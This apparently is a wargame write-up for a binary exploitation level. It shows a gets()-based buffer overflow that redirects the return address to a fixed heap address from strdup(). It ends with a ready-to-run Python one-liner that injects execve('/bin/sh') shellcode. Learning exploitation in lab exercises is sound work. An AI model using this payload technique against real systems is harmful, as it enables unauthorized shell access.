# Level 2

## Observations

1. The programs simply repeat the given input and then exits.
2. Function `p()` that is called by main uses `gets()` to get the input.
3. Function `p()` checks that EIP is **not** set on an address located on the stack before returning.
4. Function `p()` uses `strdup()` to copy the buffer to the heap and return the result.

## Plan   

The plan is to write a shellcode of our own in the buffer then create a *Buffer Overflow* to overwrite EIP to a specific address containing our shellcode that is **not** on the stack, *but which one* ?

Using `ltrace` we can look at the functions' return value and notice that `strdup()` *always* returns the same address, hinting that *ASLR* is off :

```bash
ltrace ./level2
[...]
strdup("hello") = 0x0804a008
```

That'd be an ideal candidate since `strdup()` returns an address that is on the heap **and** that points to a buffer containing our shellcode.  

- We want to overwrite EIP to **0x0804a008**.   
- Using a *Buffer Overflow Pattern Generator* and *GDB* we can see that after writing **80 bytes** in the buffer we start to overwrite EIP.
- The last thing we need is a shellcode, we will tinker [this one](https://shell-storm.org/shellcode/files/shellcode-250.php) and remove the first *9 bytes* that are useless to us right now.

## Payload

```bash
(python -c 'print "\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "A" * 56 + "\x08\x04\xa0\x08"[::-1]'; cat -) | ./level2
```

Since our shellcode is `24` bytes long, we only need `56` more bytes to reach the limit of `80` bytes.  
The return address of `strdup()` is converted to Little Endian.